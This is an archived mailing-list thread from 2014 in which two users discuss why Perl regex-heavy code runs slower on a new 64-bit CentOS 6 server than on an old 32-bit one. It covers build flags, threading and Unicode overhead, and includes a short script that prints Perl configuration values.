> significant difference is the architecture.
>
> I could provide some of my benchmarking code if that would be of help. The
> differences are significant. The only reason I'm looking at this is because
> I could see right off that some of my code is taking 30-40% longer to run
> in the new environment. Once I started putting in some timing
> with Time::HiRes I could see the delay involved large amounts of regexp
> processing.
>
> Right now, I'm just looking for any opinions on what I'm seeing so that I
> know the architecture is the significant factor in the performance
> degradation and then consider any recommendations for improvements. I'm
> happy to provide further relevant details.

This sounds like it could be something OS-specific and, googling
CentOS regex performance generates hits, eg,

http://pkgs.org/centos-5/puias-computational-x86_64/boost141-regex-1.4.0-2.el5.x86_64.rpm.html

HTH,
Charles DeRykus

Re: perl regexp performance - architecture?

2014-02-17 Thread Phil Smith

On Mon, Feb 17, 2014 at 6:16 PM, Charles DeRykus dery...@gmail.com wrote:

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5 perl5.8
perl, and in particular regexp operations, perform reasonably fast.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking
for significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help.
The differences are significant. The only reason I'm looking at this is
because I could see right off that some of my code is taking 30-40% longer
to run in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

This sounds like it could be something OS-specific, and googling
"CentOS regex performance" generates hits, e.g.,

http://pkgs.org/centos-5/puias-computational-x86_64/boost141-regex-1.4.0-2.el5.x86_64.rpm.html

No, I really don't think it is specific to a version of CentOS. I've
installed various permutations of 32 and 64 bit CentOS 5 and 6. The better
performance seems to follow the 32 bit architecture rather than a specific
Perl version or CentOS version.

Phil

Fwd: perl regexp performance - architecture?

2014-02-17 Thread Charles DeRykus

On Mon, Feb 17, 2014 at 4:25 PM, Phil Smith philbo...@gmail.com wrote:

On Mon, Feb 17, 2014 at 6:16 PM, Charles DeRykus dery...@gmail.com wrote:

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5, perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have
tried perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I thought
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

Is it an accepted fact that perl performance takes a hit on 64 bit
architecture?

I've tried comparing some of the perl -V and Config.pm results looking
for significant differences. That output is pretty verbose and the most
significant difference is the architecture.

I could provide some of my benchmarking code if that would be of help.
The differences are significant. The only reason I'm looking at this is
because I could see right off that some of my code is taking 30-40% longer
to run in the new environment. Once I started putting in some timing
with Time::HiRes I could see the delay involved large amounts of regexp
processing.

Right now, I'm just looking for any opinions on what I'm seeing so that
I know the architecture is the significant factor in the performance
degradation and then consider any recommendations for improvements. I'm
happy to provide further relevant details.

This sounds like it could be something OS-specific, and googling
"CentOS regex performance" generates hits, e.g.,

http://pkgs.org/centos-5/puias-computational-x86_64/boost141-regex-1.4.0-2.el5.x86_64.rpm.html

Newer perl regex engines have added Unicode support which can
add drag. I'd be surprised though if just the 64-bit architecture itself
was totally responsible for major slowdowns. Some of the issues are
mentioned here:

http://stackoverflow.com/questions/17800112/upgraded-from-perl-5-8-32bit-to-5-16-64bit-regex-performance-hit

Per the above, some of the items you'll need to be careful with:

+ were both Perls compiled with the same flags?
+ are both perls threaded perls? (disabling threading support makes it
  faster)
+ how big are your integers? 64 bit or 32 bit?
+ what compiler optimizations were chosen?
+ did your previous Perl have some distribution-specific patches
  applied?

Basically, you have to compare the whole perl -V output.
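
As a rough starting point for that comparison, here is a small sketch that prints a handful of build settings from the core Config module. The choice of keys and the build_summary helper are my own assumptions for illustration; perl -V remains the complete picture and also lists any locally applied patches.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Config;

# Build settings related to the checklist above. This selection is an
# assumption; extend it with whatever differs in your perl -V output.
my @keys = qw(version archname usethreads useithreads ivsize ptrsize
              use64bitint cc optimize ccflags);

# Return one formatted "key value" line per setting. Settings that are
# not defined for this build (e.g. usethreads on an unthreaded perl)
# are shown as 'undef'.
sub build_summary {
    return map {
        my $value = $Config{$_};
        sprintf "%-12s %s", $_, defined $value ? $value : 'undef';
    } @keys;
}

print "$_\n" for build_summary();
```

Saving the output on each server and running diff on the two files shows at a glance whether threading, integer size or optimization flags differ between the builds.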

As you can see, you need to examine the comparison scenarios carefully.

--
Charles DeRykus

Re: perl regexp performance - architecture?

2014-02-17 Thread Phil Smith

On Mon, Feb 17, 2014 at 9:10 PM, Charles DeRykus dery...@gmail.com wrote:

On Mon, Feb 17, 2014 at 4:25 PM, Phil Smith philbo...@gmail.com wrote:

On Mon, Feb 17, 2014 at 6:16 PM, Charles DeRykus dery...@gmail.com wrote:

On Mon, Feb 17, 2014 at 12:41 PM, Phil Smith philbo...@gmail.com wrote:

I'm currently loading some new servers with CentOS6 on which perl5.10
is the standard version of perl provided. However, I've also loaded
perl5.18 and I don't think the version of perl is significant in the
results I'm seeing. Basically, I'm seeing perl performance significantly
slower on my new systems than on my 6 year old systems.

Here's some of the relevant details:

+ 6 year old server, 32 bit architecture, CentOS5, perl5.8
perl, and in particular regexp operations, perform reasonably fast.

+ Very new server, 64 bit architecture, CentOS6, perl5.10 (and have
tried perl5.18)
perl, and in particular regexp operations, perform significantly slower
than on the 6 year old server. That struck me as odd right off. I thought
surely, perl running on a modern high-end cpu is going to beat out my code
running on 6 year old hardware.

I've compared CPU models at various CPU benchmarking sites and the new
CPUs, as you would expect, are ranked significantly higher in performance
than the old.

I've also installed perl5.8 on the new 64bit servers and the
performance is similar to that of perl5.10 and perl5.18 on the same 64bit
servers. Given that, I don't think the perl version is a significant factor
in the performance differences.